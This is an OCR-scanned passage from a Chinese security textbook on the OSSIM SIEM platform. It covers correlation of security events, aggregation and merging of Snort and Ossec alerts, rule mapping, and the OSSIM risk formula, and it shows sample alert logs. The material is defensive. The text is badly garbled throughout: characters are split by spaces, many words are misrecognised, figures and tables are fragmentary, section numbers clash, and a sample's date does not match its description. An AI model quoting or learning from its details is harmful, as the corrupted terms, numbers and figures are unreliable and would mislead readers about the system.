聚合 处 理 可 以 为 后 续 关联 提供 高 质量 的 安全 事件 , 提高 关联 引擎 效率 。 而 分 类 处 理 可 将 已 
知 可 信和 度 提高 , 受 关注 高 的 安全 事件 可 直接 提升 为 报警 。 而且 分 类 通过 对 报警 数据 库 、 日 志 
据 库 、 知 识 库 综合 进行 分 析 统 计 , 产生 受 控 网 段 内 最 常 被 攻击 的 主机 和 端口 分 布 , 统计 相同 数 
据 源 和 相同 目标 端口 的 安全 事件 的 数量 ， 这 样 就 可 以 客观 地 反映 网 络 异常 情况 。 

在 OSSIM 系统 中 关联 分 析 功 能 同样 是 由 关联 引擎 来 实现 ， 关 联 引擎 策略 文件 定义 位 于 
/etc/ossim/server/， 分 析 的 数据 由 探 针 来 收集 。 

FREF CSensor) 每 天 要 从 网 络 上 收集 到 成 千 上 万 的 事件 ， 如 果 对 这 些 海量 的 事件 信息 不 加 
任何 处 理 就 直接 生成 事件 , 这 种 做 法 是 毫 无 意义 的 。 而 在 报告 之 前 通过 关联 分 析 可 以 将 这 些 成 
千 上 万 的 事件 进行 浓缩 〈 聚 类 )， 并 确认 成 数 十 个 甚至 数 个 事件 显示 在 Web 前 端的 SIEM 中 。 
简单 理解 就 是 OSSIM 的 网 络 安全 事件 关联 分 析 能 将 不 同 功能 的 开源 网 络 安全 检测 工具 产生 的 


报警 信息 进行 去 伪 存 真 ， 从 而 挖掘 出 真正 的 网 络 攻击 事件 。 


E 定义 关联 策略 的 配置 文件 位 于 /etc/ossim/server/config.xml。 | 


OSSIM 使 用 了 两 种 关联 引擎 进行 安全 行为 的 关联 分 析 ， 分 别 是 基于 事件 序列 的 关联 方法 


和 启发 式 的 关联 方法 。 


一 个 基本 的 交叉 关联 规则 举例 : 如果 Snort 发 现 基于 一 个 目标 IP 的 攻击 ， 则 说 明 该 目标 
IP 主机 有 漏洞 ， 其 可 靠 性 系数 为 10 CHI 100% 攻 击 成 功 )。 如 图 4-19 所 示 中 REL 的 值 为 10， 
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即 代 表 当 前 时 间 可 靠 性 系数 为 0， 所 以 风险 值 为 4。 这 个 值 也 可 以 在 数据 源 中 修改 。 对 于 启发 
式 关 联 暂 时 放 到 4.5 节 再 详细 解读 。 


SIGNATURE DATEGMT4:00 SOURCE DESTINATION username $D paio REL -HK a 
IRC bot detected on ^. 20141005200329 192.168.11.151:1118 wm 148.81.111.12165520 
J IRC bot detected on 20141005200329 。 192.16811.15111118 wp 148.81.111.121:65520 Empty 


i e, 
IRC bot detected on 20141005200327 192.168.11.200:1103 wm 148.81.111.121:65520 


Wil ili 


incbotdetecedon ^" — 2014100520327 — 19216811.2001103 wag 148.81.111.121:05520 
图 4-19 高 风险 值 的 事件 举例 


可 靠 性 和 优先 级 的 数值 决定 了 风险 大 小 ， 手 动 修改 数据 源 REL/PRIO 的 方法 如 图 4-20 所 
示 。 注 意 : 这 样 修改 后 对 全 局 有 效 ， 并 不 是 仅 对 单条 事件 。 


MODIFY REUPRIO 


图 4-20 修改 优先 级 和 可 靠 性 


4.2.8 ”事件 的 交叉 关联 
攻击 总 是 作用 于 特定 的 网 络 环境 ， 环 境 条 件 不 具备 时 ， 攻 击 不 能 取得 成 功 。 对 于 那些 即使 
是 由 真实 攻击 产生 ， 但 不 具备 攻击 成 功 条 件 的 安全 事件 ， 其 威胁 度 也 可 置 为 很 低 。 

本 书 第 6 章 将 分 析 ，IDS 会 产生 大 量 误 报 的 主要 原因 之 一 是 ，IDS 检测 时 基本 不 考虑 现实 
网 络 的 情况 如 网 络 拓扑 和 主机 信息 等 )， 那 么 单独 使 用 Snort 已 经 变 得 没有 意义 ， 在 OSSIM 
平台 中 的 做 法 是 ， 通 过 IDS 告警 关联 的 数据 模型 ， 采 用 受 监控 信息 系统 的 特性 信息 、 漏 洞 信 
息 、 安 全 工具 的 信息 以 及 安全 事件 四 类 信息 进行 交叉 关联 。 交 叉 关 联 是 确认 告警 非常 有 效 的 方 
法 , 当 存在 未 知 的 漏洞 以 及 漏洞 扫描 系统 本 身 存在 漏 扫 ( 没 有 发 现 系统 存在 的 漏洞 ) 和 误 扫 ( 误 
认为 系统 存在 漏洞 》 时， 交叉 关联 会 出 现 漏 报 和 误 报 。 
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人 


^. 报警 聚合 


不 同 的 报警 有 不 同 的 报警 格式 ,日 志 分 析 与 解码 是 指针 对 各 类 日 志 (如 系统 日 志 与 应 用 程 
序 日 志 、 防 火 墙 日 志 、 网 络 设备 日 志 等 ) 信息 ， 按 其 各 自 的 格式 分 别 解析 成 统一 的 事件 格式 ， 
从 而 为 下 一 步 的 分 析 和 处 理 做 准备 。 下 面 是 几 种 产品 的 报警 日 志 信息 样本 。 


4.3.1 报警 样本 举例 
(1) Web Sever 的 日 志 样本 如 下 : 


(2) Snort 的 报警 日 志 样本 如 下 : 


(3) Ossec 的 报警 日 志 样本 如 下 : 
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User: (none) 
Nov 12 18:32:57 lty-desktop syslogd1.5.0#lubuntul: restar 


(4). 防火 墙 的 日 志 样本 如 下 : 

[08:11:37] 192.168.8.12 试图 连接 本 机 的 3498 端口 

TCP 标志 : S， 该 操作 被 拒绝 。 

[12:55:07] 接 收 到 192.168.8.15 的 UDP 包 ， 本 机 端口 : 1214 

对 方 端口 ，0ICQ S 的 [8000] 该 包 被 拦截 。 

[13:12:02]192.168.8.12 尝试 用 Ping 来 探测 主机 ， 该 操作 被 拒绝 。 

由 上 面 的 报警 日 志 信息 ， 我 们 可 以 看 出 各 种 日 志 相互 独立 ， 它 们 之 间 缺 少 统一 的 互动 合 
作 ， 所 以 各 自 产 生出 来 的 报警 日 志 格式 及 信息 会 有 所 不 同 ， 这 就 不 利于 我 们 对 整个 网 络 安全 事 
件 进行 查看 和 掌握 ,肯定 不 乏 大 量 的 元 余 信息 ， 因 此 不 利于 我 们 对 报警 事件 集 进行 聚 类 与 关联 
分 析 ， 攻 击 场景 的 构建 及 攻击 意图 的 挖掘 ， 严 重 影响 了 系统 的 检测 结果 和 实时 监控 性 能 。 

所 以 我 们 需要 对 这 些 报警 信息 进行 日 志 的 分 析 与 解码 , 去 除 一 些 正常 的 访问 记录 和 误 报 
信息 ， 提 取出 真正 报警 信息 里 的 关键 字段 ， 并 将 之 存储 为 统一 格式 ， 便 于 下 一 阶段 聚 类 与 关 
联 分 析 。 


4.3.2 ”事件 聚合 

不 同 的 攻击 行为 , 产生 不 同 的 报警 信息 , 由 于 安全 产品 各 式 各 样 , 报警 的 格式 会 有 所 差异 。 
下 面 我 们 用 不 同 的 方法 对 安全 产品 产生 出 来 的 报警 信息 进行 聚 类 与 合并 。 在 实际 应 用 中 , 采用 
基于 主机 和 基于 网 络 的 IDS 混合 检测 方式 ， 对 主机 和 网 络 进行 监测 。 基 于 主机 的 监测 软件 用 
Ossec， 基 于 网 络 的 借助 于 Snort 监控 软件 来 完成 。 主 机 监控 软件 Ossec 可 以 完成 主机 上 的 审 
计 记 录 、 系 统 日 志 、 防 火 墙 日 志 、 应 用 程序 日 志 、Rootkit 检测 等 分 析 ， 伴 随 着 对 整个 主机 的 
监控 日 志 ossec-alert.log 

网 络 入 侵 检 测 软件 Snort 负责 对 网 络 上 的 数据 包 进 行 深度 检测 ， 它 由 三 个 重要 的 子 模块 
构成 : 

© — 数据 包 解 码 器 模块 


e 检测 引擎 模块 
e 日志 与 报警 系统 模块 


Snot 主要 工作 模式 有 三 种 ， 分 别 是 : 嗅 探 器 模式 ， 数 据 包 记录 器 模式 和 网 络 入 侵 检测 系 
统 模式 。 嗅 探 器 模式 仅 从 网 络 上 读 取 数据 包 ， 并 作为 数据 流 显示 在 终端 。 

数据 包 记 录 器 模式 的 主要 工作 是 把 在 网 络 上 收集 到 的 数据 包 记 录 到 硬盘。 另外 ，Snort 的 
配置 是 可 以 按照 用 户 的 需求 , 根据 自己 网 络 环境 的 具体 情况 和 不 同 而 设 定 自己 想 要 的 功能 , 配 
置 比较 灵活 。 因 此 ， 可 以 通过 让 Snort 分 析 网 络 数据 包 来 匹配 用 户 自 定义 规则 ， 并 根据 检测 
结果 采取 行动 ， 详 情 参见 第 6 章 。 
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4.3.8 ”事件 聚合 举例 

我 们 对 上 述 两 类 检测 工具 的 报警 信息 进行 分 析 后 ， 看 出 Ossec 报警 信息 主要 由 IP 地 址 、 
登录 的 用 户 和 对 此 主机 的 操作 内 容 的 记录 、 报 警 级 别 、 报 警 时 间 、 用 户 名 和 规则 ID 等 几 部 
分 组 成 。 根据 报警 信息 所 包含 的 这 些 特 征 属性 , 我 们 可 以 指定 一 系列 规则 ， 对 这 些 报警 信息 进 
行 解码 , 再 进行 模式 匹配 ， 从 而 把 报警 事件 进行 分 类 , 对 主机 入 侵 检 测 软件 Ossec 的 报警 信息 ， 
我 们 可 以 通过 其 规则 ID 找到 入 口 ， 以 报警 类 别 进行 分 类 。 

比如 下 面 这 条 Ossec 的 报警 日 志 ， 表 明日 志 服务 器 重新 启动 。 触 发 的 规则 编号 为 1006, 
报警 时 间 是 2013 年 9 H 12 HFE 18 点 33 分 59 秒 ， 报警 级 别 为 5 级 ， 报 警 的 大 类 别 属于 
syslog， 子 类 为 errors 


** Alert 1226486039.3272: - syslog,errors, 

2013 Nov 12 18:33:59 lty-desktop-»/var/log/syslog 

Rule: 1006 (level 5) -> 'Syslogd restarted." 

Src IP: (none) 

User: (none) 

Nov 12 18:32:57 lty-desktop syslogdl.5.0f&lubuntul: restart. 


负责 对 数据 包 进 行 监控 的 Snort 报警 日 志 主要 由 时 间 、IP 地 址 、 通 信 协 议 、 事 件 ID、 报 
警 级 别 和 报警 事件 描述 等 几 部 分 组 成 。 由 于 同一 种 攻击 ， 一 般 只 采用 一 种 网 络 协议 的 方式 ， 所 
以 我 们 可 以 对 网 络 入 侵 检测 工具 Snort 的 报警 信息 采用 基于 协议 的 方式 进行 分 类 。 例 如 从 下 
面 的 几 条 报警 中 ,我们 可 以 看 到 主机 正在 遭受 网 络 探测 工具 的 攻击 利用 的 协议 是 ICMP 协议 


07/16-11:58:41.160021 [**] [1:483:5] ICMP PING CyberKit 2.2 Windows [**] 

[Classification: Misc activity] [Priority: 3] {ICMP} 221.217.44.192 -> 
202.203.208.104 

07/16-12:04:26.068608 [**] [1:483:5] ICMP PING CyberKit 2.2 Windows [**] 

[Classification: Misc activity] [Priority: 3] (ICMP) 207.190.60.251 -> 
202.203.208.104 

07/16-12:14:27.113751 [**] [1:483:5] ICMP PING CyberKit 2.2 Windows [**] 

[Classification: Misc activity] [Priority: 3] (ICMP) 218.255.241.205 -> 

202.203.208.104 


再 如 下 面 这 几 条 攻击 行为 ， 通 过 其 报警 信息 看 出 来 ， 网 络 系统 正在 遭受 着 针对 CGI 漏洞 
的 扫描 攻击 等 ， 其 中 所 利用 的 通信 协议 是 TCP 协议 。 

03/29-18:50:22.491474 [**] [1:1113:5] WEB-MISC http directory traversal [**] 

[Classification: Attempted Information Leak] [Priority: 2] (TCP) 

220.164.125.98:49245 -» 202.203.208.104:80 

03/29-18:50:25.609606 [**] [1:1113:5] WEB-MISC http directory traversal [**] 

[Classification: Attempted Information Leak] [Priority: 2] (TCP) 

220.164.125.98:49314 -» 202.203.208.104:80 

03/29-18:50:25.719474 [**] [1:1113:5] WEB-MISC http directory traversal [**] 

[Classification: Attempted Information Leak] [Priority: 2] {TCP} 

220.164.125.98:49316 -» 202.203.208.104:80 
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03/29-18:50:25.745592 [**] [1:1113:5] WEB-MISC http directory — 
下 面 的 几 条 Snort 的 报警 是 基于 UDP 协议 的 、 针 对 CGI 漏洞 的 攻击 。 


总 之 ， 针 对 不 同 的 报警 信息 应 该 采用 不 同 的 聚 类 与 合并 的 方法 ， 对 元 余 报警 信息 进行 处 
理 。 聚 类 的 依据 可 以 是 报警 日 志 中 的 关键 字 、 事 件 ID 和 攻击 特征 等 。 分 别 识别 出 各 类 攻击 ， 
如 CGI 攻击、 缓冲 区 溢出 、DOS 攻击 和 SQL 注入 攻击 等 类 。 


4.3.4 ”事件 聚合 在 OSSIM 中 的 表现 形式 

网 络 安全 事件 的 关联 分 析 技术 是 对 不 同 地 点 、 不 同时 间 、 不 同 设备 上 的 网 络 告警 进行 多 维 
度 的 分 析 ， 对 于 事件 聚合 的 目标 就 是 消除 重复 报警 。 下 面 我 们 观察 OSSIM 如 何 采 用 图 形 化 方 
式 展示 出 来 。 首 先 查看 Alarm 分 组 效果 ， 如 图 4-21 所 示 ，SIEM 分 组 如 图 4-22 所 示 。 


ALARMS 
LIST VIEW. GROUP VIEW 


SEARCH AND FILTER 


GROUPED BY | Alarm name . 

日 中 GROUP OWNER HIGHEST RISK 
日 * AÁ Trojan infection — Kary (20 alarms) Take o 

e e ^h Malware infection — Malware contacting Dynamic Domain (11 alarms) Take o 

B + © Bruteforce Authentication — SSH (426 alarms) Take 2 
[T La Malware infection — infection (417 alarms) Release 1 
Oe La CAC Communication — Sinkhole - Abuse.ch (372 alarms) Release o 


图 4-21 Alarm 分 组 聚合 
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SIGNATURE IOTALÉit)A UNIQUESRC.# UNIQUEDST.# LATESTEVENT 
S5Hd Receved aisconne 73938 
SSHd: Login sucessful, Accepted publickey 75026 
ASA: The specified host tried to access the specified URL 5691 
ASA: An address translation slot was created 4455 
Deny inbound (No xiate) string 3825 


图 4-22 SIEM 分 组 聚合 


图 4-21、 图 4-22 所 给 出 的 仅 是 一 些 典 型 攻击 报警 案例 ， 在 实践 中 黑客 攻击 步骤 复杂 ， 我 
们 通过 构造 好 的 关联 规则 , 才能 将 多 条 告警 还 原 成 一 个 完整 的 攻击 场景 ， 问 题 来 了 ， 到 底 如 何 
构造 关联 规则 呢 ? 参见 4.7 节 内 容 。 


4.3.5 SIEM 中 的 宛 余 报警 
宛 余 报警 的 产生 途径 分 两 种 , 一 种 是 由 于 多 个 安全 产品 的 同时 使 用 , 所 以 会 出 现 同一 个 攻 
击 被 多 个 检测 引擎 同时 检测 出 来 的 现象 ， 另 一 种 是 相同 攻击 被 一 个 安全 产品 多 次 检测 出 来 。 
合并 宛 余 的 报警 信息 主要 从 3 方面 来 考虑 : 
(1) 合并 基于 主机 的 监控 Ossec 产生 的 宛 余 报警 事件 。 
(2) 合并 基于 网 络 的 监控 Snort 产生 的 元 余 报 警 事件 。 
(D 合并 主机 监控 Ossec 和 网 络 监控 Snort 对 相同 攻击 产生 的 报警 信息 。 


Snort 报警 信息 比较 全 面 ， 特 征明 显 ， 对 Snort 产生 出 来 的 报警 事件 合并 的 过 程 可 以 采用 
基于 属性 相似 度 的 方法 。 而 对 于 Ossec 的 报警 事件 的 合并 ，OSSIM 采用 基于 事件 ID 和 报警 类 
别 信息 相 结合 的 方法 。 目 前 Ossec 有 900 多 条 检测 规则 ， 均 以 XML 格式 存储 。 经 过 统计 分 析 
之 后 ， 可 以 按 报警 的 行为 来 分 类 ， 共 分 为 80 个 报警 大 类 ， 常 见 的 包括 Syslog, Firewall, IDS, 
Web. Squid. Windows 等 。 以 OSSEC 报警 的 事件 ID 为 入 口 ， 从 而 进行 逐 级 的 类 与 子 类 之 间 
的 匹配 ， 以 达到 匹配 与 合并 的 目的 。 


4.9.6 合并 相似 事件 

聚合 的 对 象 是 基于 Snort 和 Ossec 所 产生 的 报警 ， 由 于 Snort 的 报警 数据 (包括 IP. 地 址 ， 
攻击 内 容 和 端口 等 ) 中 含有 协议 属性 ， 可 采用 基于 规则 的 方式 聚合 ,在 聚 类 过 程 中 可 以 保证 报 
警 信息 得 到 正确 的 归 类 。 

对 于 Ossec 产生 的 报警 信息 ， 其 报警 事件 的 ID 为 入 口 ， 逐 步 按 报警 类 别 进 行 聚 合 ， 合 
并 出 来 的 误差 低 。 以 ID 为 入 口 按 根 类 别 进 行 合并 的 方式 ， 节 省 了 遍历 报警 信息 进行 聚 类 与 合 
并 的 时 间 。 

OSSIM 采用 了 Ossec 来 实现 对 主机 的 审计 记录 ， 系 统 日 志和 应 用 程序 的 采集 分 析 。 同 时 
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使 用 Snort 对 网 络 上 的 数据 包 进行 采集 , 完成 实时 流量 分 析 和 对 网 络 上 的 IP 包 进行 测试 等 功 
能 ， 也 可 进行 协议 分 析 、 内 容 查找 和 匹配 ， 能 用 来 探测 多 种 攻击 和 嗅 探 (如 缓冲 区 溢出 和 
ShellCode 攻击 等 )。 


4.3.7 ”同类 事件 的 判别 

对 于 两 条 事件 而 言 , 如 果 它们 的 相似 程度 较 高 ,那么 就 认为 它们 是 同一 个 攻击 而 进行 合并 ， 
否则 就 认为 是 互 不 相关 的 攻击 行为 。 这 种 相同 的 相似 度 报警 如 图 4-23 所 示 ， 不 同 的 相似 度 报 
警 如 图 4-24 所 示 。 


;[.] ossec SSHD authentication success [avapi]. 2015-06-04 00:07:41 VirtualUSMAIIInOne VirtualUSMAllInOne:53914 virtualusMAllinone 


j [] 0ssec: SSHD authentication success [avapi]. 2015-06-04 00:07:39 — VirtualUSMAllinOne VirtualUSMAllInOne:;S3910 virtualUSMAllinOne 


图 4-23 ”相同 Ossec 报警 事件 


SIGNATURE vw EVENTS #(*)a UNIQUESRC.# UNIQUEDST.& LATEST EVENT GRAPH 


Evers 
[] sudo: Command executed 1 1 1 2015-06-0400H | 


口 ossec Successful sudo to 1 1 1 


424 ”不同 Ossec 报警 事件 


该 思路 如 何 让 计算 机 识别 呢 ? 可 以 从 计算 这 两 条 报警 信息 之 间 的 相似 度 入 手 , 首先 考虑 这 
两 条 报警 的 共有 属性 。 这 些 属 性 包括 攻击 源 、 目 标 〈 主 机 IP 和 端口 )、 攻 击 类 型 、MAC 地 址 、 
时 间 信息 和 事件 ID 等 。 据 此 我 们 可 以 对 报警 事件 的 属性 进行 抽象 化 建 模 ， 这 种 模型 的 流程 如 
图 4-25 所 示 ， 将 它们 的 属性 定义 为 一 个 事件 属性 集 。 我 们 对 元 余 的 报警 事件 所 采用 的 合并 方 
法 的 出 发 点 就 是 , 对 相同 的 攻击 行为 的 报警 信息 之 间 存 在 着 很 高 的 相似 度 , 对 不 同 的 攻击 行为 
的 报警 相似 度 较 低 。 


收 到 报警 日 志 


事件 归 一 化 
及 分 类 


425 ”聚合 流程 图 
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4.8 合并 流程 

以 Ossec 事件 的 聚合 为 例 ， 其 合并 的 算法 步骤 可 以 描述 为 : 

CD 根据 已 知 知识 定义 报警 数据 库 ; 

(2) 接收 新 的 报警 事件 并 进行 分 析 与 解码 ; 

OD 对 新 报警 事件 解码 并 按照 协议 号 或 事件 ID 和 内 容 进行 格式 的 规范 化 ; 

(4) 在 IDS 里 相同 的 攻击 行为 总 是 在 一 段 连续 的 时 间 内 发 生 的 ， 时 间 越 接近 相似 程度 会 
越 高 。 另 外 ， 考 虑 到 在 计算 属性 的 相似 度 时 ， 要 用 到 时 间 属 性 ， 所 以 将 新 加 入 的 报警 〈 第 nel 
条 ) 在 同一 类 中 逐个 与 旧 报警 信息 ( 共 n 条 ) 计算 属性 的 相似 度 。 


在 计算 时 采用 比较 法 即 先 计算 新 信息 和 第 n 条 报警 事件 的 属性 相似 度 如 果 不 满足 合并 ， 
接着 和 第 n-1 条 做 比较 ， 依 次 迭代 到 第 1 条 。 


4.8.9 ”事件 映射 
实践 中 发 现 对 一 些 攻击 行为 ，Snort 和 Ossec 会 产生 报警 现象 ， 比 如 Synflood 攻击 。 但 对 
于 其 他 一 些 攻击 行为 ,Snort 和 Ossec 会 同时 产生 报警 , 比如 Nmap 扫描 , 对 于 由 Ossec 和 Snort 
工具 所 产生 的 、 对 同一 攻击 行为 的 重复 报警 信息 的 合并 ,采用 映射 规则 的 方法 。 其 映射 原理 如 
F: 
(OD 自 定 义 一 个 报警 规则 集 ， 称 为 内 部 规则 集 ， 赋 予 每 条 内 部 规则 集 一 个 编号 及 对 应 的 
描述 。 
(2) 由 于 Ossec 的 规则 有 900 多 条 ， 所 以 可 以 把 Ossec 的 每 一 条 报警 规则 都 用 基于 规则 
ID 的 方式 映射 到 内 部 规则 集中 ， 即 把 Ossec 的 报警 规则 和 内 部 自 定义 的 规则 逐条 对 应 。 
(3) Snort 的 报警 规则 有 9000 条 ， 逐 条 地 实现 映射 到 内 部 规则 集 的 任务 量 太 大 ， 可 按 报 
和 警 的 类 别 和 基于 服务 分 为 30 个 大 类 报警 规则 ， 其 中 每 个 大 类 里 面 又 含有 小 类 。 
(4) 将 Snort 的 报警 规则 按 报警 类 别 和 基于 的 服务 也 逐条 地 映射 到 内 部 规则 集中 。 
这 样 通过 上 面 过 程 从 而 使 重复 的 报警 信息 量 进 一 步 降低 。 


4.3.10 ”Ossec 的 报警 信息 的 聚 类 

从 Ossec 事件 ID 入 口 ， 根据 报警 类 别 进行 合并 ， 其 中 一 些 报警 信息 只 有 一 个 根 类 别 ， 比 

** Alert 1326486837.2066: - ossec,2014 Nov 12 10:30:57 
lty-desktop->ossec-logcollector 

Rule: 591 (level 3) -> 'Log file rotated." 

Src IP: (none) 

User: (none) 

ossec: File rotated (inode changed): '/var/log/syslog'. 
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有 些 报警 信息 类 别 间 的 层次 关系 不 是 一 层 ， 例 如 ， 下 面 这 条 针对 缓冲 区 管理 漏洞 的 攻击 
的 一 条 Ossec 报警 信息 。 

** Alert 1226484882.185: - syslog,sshd,authentication success,2014 Nov 12 
10:14:42 lty-desktop-»/var/log/auth.log 

Rule: 5715 (level 3) -> 'SSHD authentication success.' 

Sro IP: 192.168.0.120 

User: lty 

Nov 12 10:14:40 lty-desktop sshd[5605]: Accepted publickey for lty from 
192.168.0.120 port 3256 ssh2 


从 报警 信息 中 ， 我 们 可 以 看 到 ， 报 警 信息 的 类 别 层 次 关系 分 为 三 层 : syslog, sshd, 
authentication success, 其 中 Syslog 日 志 服 务 器 做 为 根 类 别 ，sshd 进程 做 为 子 类 别 ， 
authentication success 信息 是 子 类 别 中 的 下 一 级 子 组 。 这 类 的 信息 聚 类 起 来 就 要 求 做 对 比 的 次 
数 要 多 ， 聚 类 查找 时 的 深度 要 比 第 一 类 报警 更 深 ， 耗 费时 间 更 长 。 

在 上 面 的 报警 信息 中 ， 我 们 可 以 看 到 报警 时 间 字 段 : 2014 Nov 12 10:14:42 和 报警 级 别 : 
level3 等 一 些 信息 ， 通 过 这 些 信 息 之 间 的 关联 对 事件 进行 合并 操作 ， 其 合并 流程 如 图 4-26 所 
不 。 


Alert (N*!) 


EN. 2 : - bé E 


* 


图 4-26 合并 流程 图 


合并 Ossec 的 重复 信息 实现 过 程 在 其 子 类 中 进行 ， 对 字段 user、ip 和 level 采取 逐个 校 
验方 式 ， 这 3 个 字段 只 要 有 差异 ， 新 接收 的 报警 就 会 转 入 下 一 节点 的 验证 合并 操作 。 对 于 攻击 
发 生 的 时 间 字 段 ， 我 们 设 定 一 个 范围 ， 如 果 这 两 个 报警 事件 的 时 间 差 的 绝对 值 超出 了 所 设 定 的 
范围 ， 可 认定 这 两 个 报警 事件 是 两 次 攻击 中 的 事件 ， 不 是 同一 次 攻击 中 的 重复 信息 ， 但 新 的 攻 
击 报警 事件 的 可 信 度 会 提高 。 如 果 遍 历 子 类 中 的 事件 无 法 合并 ， 则 把 此 信息 加 入 该 子 类 作为 该 
子 类 的 新 元 素 。 
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4.3.11 Ossec 与 Snort 事件 合并 


由 于 Ossec 对 网 络 流量 不 敏感 ， 而 Snort 对 网 络 上 的 数据 包 起 到 检测 作用 ,所 以 对 于 大 部 
分 的 简单 攻击 行为 来 说 ，Ossec 和 Snot 只 会 有 一 个 程序 对 攻击 进行 报警 。 随 着 攻击 方式 的 改 
变 ， 现 在 很 多 攻击 行为 融合 在 一 起 ， 采 取 复 杂 的 攻击 方式 进行 入 侵 。 

所 以 对 于 一 些 复杂 的 攻击 事件 ，Ossec 和 Snot 会 同时 对 一 个 攻击 行为 产生 报警 。 对 于 
二 者 的 合并 ， 我 们 采用 借助 中 间 人 的 方式 来 完成 ， 即 定义 一 个 内 部 的 报警 行为 规则 表 。 

通常 攻击 的 过 程 分 为 3 个 阶段 ， 即 预 攻 击 阶 段 (端口 扫描 , 漏洞 扫描 和 系统 鉴别 等 信息 收 
集 过 程 )， 攻 击 实施 阶段 〈 访 问 注入 ， 提 升 权 限 和 拒绝 服务 等 )， 攻 击 后 阶段 〈 窃 取 数 据 ， 安 装 
后 门 程 序 和 自 改 文件 等 )。 

其 中 定义 了 内 部 规则 表 , 对 Ossec 的 900 多 条 规则 逐个 进行 映射 把 这 些 规则 根据 报警 
事件 中 攻击 行为 的 目的 ， 分 别 映射 到 内 部 规则 上 ， 读 者 可 以 打开 
/etc/ossim/agent/plugins/ossec-single-line.cfg 文件 ， 找 到 [translation] 项 ， 其 中 包括 31151=7014、 
5706=7014、31163=7014。 

上 例 中 的 第 一 条 映射 规则 就 是 把 Ossec 的 事件 ID 号 为 31151 的 报警 规则 映射 到 7014。 


风险 评估 方法 


44.1. 风险 评估 三 要 素 

风险 评估 (Risk Assessment) 对 网 络 内 的 资产 及 整个 网 络 进行 的 风险 评估 。 风 险 评估 是 包 
括 威胁 、 资 产 和 漏洞 的 评估 ， 其 目的 是 帮助 识别 资产 ， 分 析 判 断 其 价值 、 存 在 的 脆弱 性 和 面临 
的 安全 威胁 ， 提 高 安全 体系 的 投资 效率 。 

OSSIM 系统 中 的 风险 评估 主要 围绕 着 威胁 (Threat)、 漏 洞 (Vulnerability)、 啊 应 (Response， 
即 安全 措施 )、 资 产 〈Asset) 来 监控 。 风 险 评估 模型 嵌入 在 OSSIM 关联 引擎 系统 中 ， 关 联 引 
擎 结合 知识 库 中 的 资产 库 、 漏 洞 库 、 威 胁 库 将 风险 的 资产 、 漏 洞 、 威 胁 三 个 要 素 用 维度 表现 出 
来 ， 它 们 的 关系 如 图 4-27 所 示 。 


资产 


威胁 


漏洞 


4-27 风险 的 三 维度 
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(1) 资产 〈Asset)， 它 是 需要 保护 的 对 象 。 


网 络 设备 : 路 由 器 、 交 换 机 等 。 
终端 设备 : 服务 器 、 工 作 站 等 。 
应 用 系统 。 
数据 。 

(2) 漏洞 (Vulnerability)， 它 是 物理 布局 、 组 织 、 人 员 、 管 理 、 硬 件 、 软 件 或 信息 中 存 
在 的 缺陷 与 不 足 ， 它 们 不 直接 对 资产 造成 危害 ， 但 脆弱 性 可 能 被 环境 中 的 威胁 所 利用 从 而 危害 
资产 的 安全 。 

G) 威胁 (Threat)， 威 胁 会 对 资产 造成 危害 ， 可 能 是 人 为 的 或 非 人 为 的 ， 可 能 是 无 意 失 
误 ， 也 可 能 是 恶意 攻击 。 


降低 风险 就 需要 挤 压 风险 “A、V、T) 三 个 值 ， 也 就 是 需要 从 三 个 维度 共同 发 力 。 


Risk-R(asset,vulnerability,threat) 


将 资产 价值 (Asset)、 优 先 级 〈Priority)、 可 靠 性 〈Reliability) 三 个 参数 组 合 进行 风险 的 
计算 是 简洁 有 效 的 ， 在 OSSIM 系统 中 使 用 以 下 公式 : 
Risk-Asset*Priority*Reliability/25 (下 文 称 风 险 模型 计算 公式 4-1) 


© Asset (资产 ， 取 值 范围 0~5) 
€ Priority (优先 级 ， 取 值 范围 0~5) 
e Reliability (可 信 度 ， 取 值 范围 0~10 ) 


由 上 面 风险 模型 计算 公式 〈4-1) 计算 每 个 Alert 事件 的 Risk 值 ， 其 中 : 


€ Asset 的 取 值 范围 为 0~5，Asset 默认 值 为 2。 在 OSSIM 系统 中 将 资产 的 关注 程度 
分 为 5 级 ， 取 值 由 低 到 高 分 别 为 1、2、3、4、5。 从 表面 上 理解 ， 数 字 的 大 小 决定 了 
风险 计算 公式 中 Risk 值 的 大 小 ， 但 也 有 更 深层 的 含义 。 有 很 多 企业 并 不 知道 其 关键 
资产 是 什么 ， 也 不 知道 如 何 保护 。 比 如 普通 工作 站 资产 等 级 为 1]， 当 它 遭 受 DOS x 
击 时 ， 我 们 可 切断 网 络 连接 。 如 果 是 数据 库 服务 器 ， 它 的 资产 等 级 为 S， 数 据 库 服 务 
需要 实时 在 线 ， 所 以 同样 遭受 DOS 攻击 ， 我 们 就 不 能 像 工作 站 那样 处 理 ， 而 应 自动 
启用 备用 IP 地 址 ， 并 将 攻击 引 向 网 络 密 锥 系统 进行 分 析 。 

€ ”优先 级 Priority 的 取 值 范围 为 0~5， 默 认 值 为 1。 该 参数 描述 一 次 成 功 攻击 ， 所 造 
成 的 危害 程度 ， 数 值 越 大 ， 则 危害 程度 越 高 ; 

e 可 信 度 或 者 叫 可 靠 性 Reliability， 取 值 范围 为 0~ 10， 默 认 值 为 1。 可 靠 性 参数 描述 
一 次 攻击 成 功 的 概率 , 最 高 值 是 10, 代表 100% 可 能 ， 所 以 其 值 越 高 ， 代 表 越 不 可 靠 ， 
大 家 也 可 以 将 此 理解 为 被 攻击 成 功 的 可 能 性 。 


大 家 在 操作 OSSIM 时 ， 打 开 Web UI 中 的 SIEM 控制 台 ， 观 察 每 条 Event 时 ， 即 能 发 现 风 
险 值 由 资产 值 优先 级 和 可 信 度 来 控制 。 网 络 中 每 个 资产 都 是 有 价值 的 ， 这 个 价值 的 量化 就 通过 
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资产 值 来 实现 ， 每 个 默认 资产 为 2 (范围 1~5)， 从 风险 计算 公式 中 可 以 分 析出 ， 风 险 计算 不 
将 资产 值 作为 影响 风险 结果 的 主要 因素 , 例如 某 些 数据 库 服务 器 资产 值 很 高 则 计算 出 的 风险 
值 也 会 很 大 。 而 那些 资产 值 小 的 工作 站 ， 在 遭受 严重 攻击 的 节点 风险 值 小 ， 这 样 很 难 被 关注 ， 
从 而 失去 原本 的 真实 性 ， 所 以 让 资产 值 的 范围 在 1~5 之 间 ， 影 响 风险 值 也 就 小 。 

在 系统 中 会 计算 出 两 个 风险 值 Risk_A、Risk_C， 如 果 资 产 价值 是 源 主机 的 asset H, WA 
计算 结果 就 是 Risk C. 如果 是 目标 主机 的 asset 值 ,那么 就 是 Risk_A。 有 关 这 两 个 值 在 alienvault 
